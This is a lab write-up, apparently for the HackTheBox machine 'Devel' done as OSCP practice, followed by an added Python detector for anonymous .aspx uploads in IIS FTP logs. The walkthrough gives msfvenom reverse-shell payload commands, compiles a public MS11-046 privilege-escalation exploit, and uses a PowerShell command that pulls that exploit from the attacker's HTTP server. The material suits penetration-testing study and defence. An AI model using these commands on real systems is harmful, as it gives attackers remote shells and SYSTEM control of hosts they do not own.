Devel

Process

21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5

Went through a lot of exploits (EternalBlue, IIS FTP server attacks); none worked.

Then realised that FTP allows uploading files, so generated a payload via [[msfvenom]] (IIS accepts .aspx):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$HOST LPORT=4444 -f aspx > exploit.aspx

But it doesn't work with an nc listener.

Realised this is because the payload is a meterpreter payload, which is not allowed in the OSCP exam and is not compatible with an nc listener...

Then use:

msfvenom -p windows/shell_reverse_tcp LHOST=$HOST LPORT=4444 -f aspx > exploit.aspx

Access denied. I am iis apppool\web

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          28/8/2022, 7:21:01
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1

Looked for Windows 7 exploits and found this: https://www.exploit-db.com/exploits/40564

i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Set up an HTTP server on Kali, then in the victim's shell:

powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.14.8/MS11-046.exe', 'exploit.exe')

Got SYSTEM

Takeaway

  1. Should have tested first whether we can put files on the FTP server

  2. IIS server accepts .aspx / .asp
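As an added defensive example (not part of the original notes): the misconfiguration behind this path is an anonymous FTP account that can write into the IIS web root. The Python below flags successful anonymous STOR uploads of .asp/.aspx files in an IIS FTP W3C-format log. The column layout and the log lines are constructed for the example; a real log's #Fields: header drives the parsing, so it adapts to the deployed layout.

```python
"""Flag successful anonymous FTP uploads of server-side web scripts (IIS FTP W3C logs)."""

WEB_SCRIPT_EXTS = {".asp", ".aspx"}  # extensions IIS executes as pages

# Constructed sample log (server 192.0.2.10 is a placeholder); the #Fields: line
# is an assumed IIS 7.5 FTP layout and is what the parser keys on.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2022-08-28 07:25:01 10.10.14.8 - 192.0.2.10 21 ControlChannelOpened - - 0 0 1 -
2022-08-28 07:25:02 10.10.14.8 anonymous 192.0.2.10 21 USER anonymous 331 0 0 1 /
2022-08-28 07:25:02 10.10.14.8 anonymous 192.0.2.10 21 PASS *** 230 0 0 1 /
2022-08-28 07:25:05 10.10.14.8 anonymous 192.0.2.10 21 STOR test.aspx 550 5 0 1 /test.aspx
2022-08-28 07:25:10 10.10.14.8 anonymous 192.0.2.10 21 STOR exploit.aspx 226 0 0 1 /exploit.aspx
2022-08-28 07:30:00 10.10.14.8 - 192.0.2.10 21 ControlChannelOpened - - 0 0 2 -
2022-08-28 07:30:01 10.10.14.8 babis 192.0.2.10 21 STOR welcome.png 226 0 0 2 /welcome.png
"""


def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated record: skip rather than misalign
        yield dict(zip(fields, parts))


def find_anonymous_script_uploads(text):
    """Return (timestamp, client_ip, path) for each completed anonymous .asp/.aspx upload."""
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-method") != "STOR":
            continue
        if rec.get("sc-status") != "226":  # 226 = transfer complete; 550 = denied
            continue
        if rec.get("cs-username", "").lower() != "anonymous":
            continue
        path = rec.get("x-fullpath") or rec.get("cs-uri-stem", "")
        ext = "." + path.rsplit(".", 1)[-1].lower() if "." in path else ""
        if ext in WEB_SCRIPT_EXTS:
            hits.append((rec["date"] + " " + rec["time"], rec["c-ip"], path))
    return hits


if __name__ == "__main__":
    for when, ip, path in find_anonymous_script_uploads(SAMPLE_LOG):
        print(f"{when} anonymous web-script upload from {ip}: {path}")
```

The failed STOR (status 550) and the authenticated PNG upload are deliberately left out, so only the write that lands an executable page in the web root is reported.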
